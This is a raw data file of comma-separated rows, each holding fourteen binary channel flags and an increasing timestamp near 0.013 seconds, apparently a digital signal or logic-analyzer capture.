1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062872e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062896e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3062948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3062972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063024e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063052e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063100e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063124e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063148e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3063156e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3063172e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3063200e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3063224e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3063252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063256e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063372e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063424e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3063428e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3063476e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3063500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063508e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063524e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063548e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063572e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063600e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063624e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063652e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063700e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063772e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063796e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063820e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063844e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063872e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063896e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3063972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3063996e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064020e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064044e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064072e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064096e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064172e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064196e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064220e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064244e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064272e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064296e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064300e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3064324e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064348e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3064372e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064396e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064448e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064472e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064500e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064524e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3064576e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064596e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,1.3064604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064608e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064620e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064644e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064700e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064724e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064748e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064772e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064800e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064804e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,1.3064852e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3064876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3064948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3064972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065000e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065024e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065172e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065200e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065224e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065372e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065424e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065452e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065476e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065500e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065524e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065548e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065572e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065600e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065624e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065652e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065676e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065700e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065724e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065748e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065772e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065800e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065824e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065852e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065900e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065924e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3065948e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3065972e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066000e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066024e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066052e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066076e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066100e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066124e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066148e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066172e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066200e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066224e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066252e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066300e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066324e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066348e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066372e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.3066400e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.3066424e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.3066428e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.3190876e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.3191072e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3191092e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,1.3191116e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3191136e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,1.3191452e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.3191476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.3191484e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,1.3191528e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.3191552e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,1.3191604e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.3191628e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,1.3191676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.3191700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3191708e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3191752e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3191780e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3191828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3191852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3191876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3191900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3191924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3191952e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192004e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192100e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192108e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3192152e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192180e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3192184e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192188e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192228e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192252e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192328e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192352e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192380e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3192404e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192436e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192552e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192580e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192724e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192732e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3192752e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192780e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192784e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192804e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192828e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192832e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3192876e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3192900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192908e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3192952e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3192976e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193004e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193052e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193100e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193108e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3193152e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193180e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3193184e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193188e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193276e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193284e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3193300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193332e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193380e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193404e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193552e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193556e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3193580e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193604e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3193608e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193612e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193652e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,1.3193656e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193660e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3193676e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3193700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193708e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193752e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193780e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3193924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3193980e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194004e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3194008e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3194028e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3194052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194060e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194100e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3194108e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3194152e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3194180e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3194184e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194188e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194328e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194352e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3194380e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3194428e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3194452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194460e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194552e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194580e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194728e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194752e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194780e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3194952e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3194980e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195052e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195060e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3195100e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195128e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3195132e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195136e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195180e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195204e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195328e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195332e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3195352e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195380e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195384e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195528e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195580e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195676e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195684e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3195700e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195728e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195732e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195752e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195780e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195804e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195828e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195832e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3195852e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3195876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195884e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3195928e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3195952e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196004e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196100e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3196108e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3196128e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3196152e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3196156e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196160e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196176e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196204e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196228e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196252e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196300e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196352e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196380e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196404e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196552e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3196556e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3196580e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3196604e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.3196608e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196612e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196752e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196804e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196900e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3196908e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3196924e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3196952e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3196956e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3196980e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3197004e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3197028e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3197052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197060e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197128e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197180e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197204e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197328e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197352e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3197356e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.3197380e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.3197404e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197412e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197552e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197580e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.3197700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.3197728e-02 